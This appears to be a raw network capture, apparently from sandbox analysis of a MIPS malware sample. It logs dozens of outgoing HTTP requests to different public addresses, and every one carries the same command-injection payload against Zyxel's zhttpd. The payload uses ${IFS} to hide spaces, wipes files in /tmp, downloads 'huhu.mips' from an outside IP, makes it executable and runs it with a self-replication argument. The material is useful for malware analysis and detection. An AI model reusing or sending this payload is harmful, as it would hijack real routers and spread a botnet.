                                                Jan 29, 2024 07:07:50.391153097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4998192.168.2.2340202146.193.169.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391211033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4999192.168.2.2356966175.158.43.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391237020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5000192.168.2.2348290200.20.168.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391274929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5001192.168.2.2339166180.57.78.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391319990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5002192.168.2.234936266.213.77.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391360998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5003192.168.2.2349328213.126.172.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391417980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5004192.168.2.2341518216.171.164.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391483068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5005192.168.2.2342644168.112.7.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403162956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5006192.168.2.235156671.30.153.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403212070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5007192.168.2.234465099.10.141.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403238058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5008192.168.2.2333730115.49.241.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403290987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5009192.168.2.2334666175.4.42.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403314114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5010192.168.2.2338008204.209.10.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403358936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5011192.168.2.2355186123.216.211.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403403997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5012192.168.2.235721814.123.196.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403430939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5013192.168.2.2357182157.219.218.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403465986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5014192.168.2.235277857.214.89.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403503895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5015192.168.2.233506489.56.7.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403547049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5016192.168.2.2342106138.215.149.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403578997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5017192.168.2.235475847.119.37.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403604984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5018192.168.2.2340682126.201.165.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403651953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5019192.168.2.2354188181.252.138.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403685093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5020192.168.2.234123292.61.21.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403712988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5021192.168.2.2355292125.173.164.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403757095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5022192.168.2.235087263.227.174.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403798103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5023192.168.2.2354262149.125.55.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403830051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5024192.168.2.2334750175.97.161.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403878927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5025192.168.2.23606044.50.0.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403920889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5026192.168.2.235908266.47.18.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.403991938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5027192.168.2.2360354203.155.204.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404004097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5028192.168.2.234546867.67.241.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404031992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5029192.168.2.234730895.206.50.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404104948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5030192.168.2.2358574132.42.178.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404143095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5031192.168.2.2360662141.198.171.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404186964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5032192.168.2.2333600213.105.91.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404223919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5033192.168.2.2355124172.42.195.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404289961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5034192.168.2.2335654115.36.15.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404319048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5035192.168.2.2341996212.31.117.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404370070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5036192.168.2.2341780156.182.180.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404405117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5037192.168.2.2346176199.187.70.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404438972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5038192.168.2.235001847.144.157.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404525042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5039192.168.2.2347892204.207.2.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404557943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5040192.168.2.233646639.163.200.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404597044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5041192.168.2.2348988205.90.230.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404627085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5042192.168.2.234698251.60.192.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404653072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5043192.168.2.2338462113.216.129.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404691935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5044192.168.2.2342356184.4.21.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404714108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5045192.168.2.235987619.254.246.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404731989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5046192.168.2.234318457.25.78.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404772043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5047192.168.2.2334118208.92.151.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404831886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5048192.168.2.2356786142.49.157.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404861927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5049192.168.2.233491681.155.216.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404892921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5050192.168.2.2358912158.5.2.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404932022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5051192.168.2.235360465.22.229.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.404967070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5052192.168.2.233323065.45.143.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405020952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5053192.168.2.2359520222.60.118.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405054092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5054192.168.2.23346901.31.55.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405101061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5055192.168.2.2352758200.160.126.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405136108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5056192.168.2.2335622109.135.85.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405162096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5057192.168.2.235589423.17.22.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405211926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5058192.168.2.234773894.99.47.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405241013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5059192.168.2.2344410155.132.87.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405277967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5060192.168.2.235200097.225.58.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.405411005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5061192.168.2.2359434101.9.69.82443
                                                TimestampBytes transferredDirectionData
